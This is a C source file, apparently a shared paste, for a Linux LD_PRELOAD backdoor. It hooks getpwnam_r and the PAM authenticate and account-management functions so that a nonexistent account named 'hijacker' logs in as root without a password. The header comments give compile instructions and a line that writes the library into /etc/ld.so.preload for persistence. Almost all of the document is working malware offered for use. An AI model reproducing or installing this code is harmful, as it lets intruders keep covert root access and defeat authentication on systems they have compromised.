LinuxBypassSO.c

1. /*
2.         Filename:       LinuxBypassSO.c
3.         Author:         Goodies (gumshoe on IRCs)
4.         Description:    This is a backdoor with the purpose of hijacking the Linux authentication functions
5.                         and the functions that parse /etc/passwd to allow a non-existant account root access
6.                         without a password or authentication. This is a backdoor and must be ran as root at
7.                         some point. If you lose root access but have access to a local account, you will be
8.                         able to sign in and acheive root access easily. This will also be used in the future
9.                         to allow SSH logins (which requires more functions to be hooked).
10.  
11.  
12.         Usage Examples:
13.                 From Root:
14.                    gcc -shared -fPIC -o ./bypass.so LinuxBypassSO.c -ldl
15.                    echo "`pwd`/bypass.so" > /etc/ld.so.preload
16.                 From Any Account:
17.                    su - hijacker
18.                 # root @ Linux acheived #
19.  
20. */
21.  
22. #define _GNU_SOURCE
23. #include <stdio.h>
24. #include <stdlib.h>
25. #include <pwd.h>
26. #include <dlfcn.h>
27. #include <security/pam_appl.h>
28. #include <security/pam_modules.h>
29. #include <string.h>
30.  
31. #define HIJACK_LOGIN    "hijacker"
32. #define AUTHOR      "Goodies" //@GoodiesHQ on Twitter
33.  
34. static int (*old_pam_authenticate)(pam_handle_t*, int);
35. static int (*old_getpwnam_r)(const char*, struct passwd*, char*, size_t, struct passwd**);
36. static int (*old_pam_acct_mgmt)(pam_handle_t*, int);
37. static char *hijacker = NULL, *r00t = NULL;
38.  
39. __attribute__((constructor)) void init(){
40.         if(!hijacker || strcmp(hijacker, "") || hijacker == NULL)
41.                 hijacker = strdup(HIJACK_LOGIN);
42.         if(!r00t || strcmp(r00t, "") || r00t == NULL)
43.                 r00t = strdup("root");
44.         if(!old_pam_authenticate)
45.                 old_pam_authenticate = dlsym(RTLD_NEXT, "pam_authenticate");
46.         if(!old_getpwnam_r)
47.                 old_getpwnam_r = dlsym(RTLD_NEXT, "getpwnam_r");
48.         if(!old_pam_acct_mgmt)
49.                 old_pam_acct_mgmt = dlsym(RTLD_NEXT, "pam_acct_mgmt");
50. }
51.  
52. int getpwnam_r(const char *name, struct passwd *pwd, char *buf, size_t buflen, struct passwd **result){
53.         if(strstr(name, hijacker)){
54.                 pwd -> pw_gid = 0;
55.                 return old_getpwnam_r(r00t, pwd, buf, buflen, result);
56.         }else
57.                 return old_getpwnam_r(name, pwd, buf, buflen, result);
58. }
59.  
60. int pam_authenticate(pam_handle_t *pamh, int flags){
61.         void *pam_user = NULL;          // populated in pam_get_item
62.         pam_get_item(pamh, PAM_USER,(const void**)&pam_user);
63.                                         // Gets the username parameter passed
64.         if(strstr(pam_user, hijacker))
65.                 return PAM_SUCCESS;     // If the user passed is HIJACK_LOGIN, return success message
66.         return old_pam_authenticate(pamh, flags);
67.         // otherwise, return the legitimate success/error
68. }
69.  
70. int pam_acct_mgmt(pam_handle_t *pamh, int flags){
71.         void *pam_user = NULL;          // populated in pam_get_item
72.         pam_get_item(pamh, PAM_USER,(const void**)&pam_user);
73.                                         // Gets the username parameter passed
74.         if(strstr(pam_user, hijacker))
75.                 return PAM_SUCCESS;     // If the user passed is HIJACK_LOGIN, return success message
76.         return old_pam_acct_mgmt(pamh, flags);
77.         // otherwise, return the legitimate success/error
78. }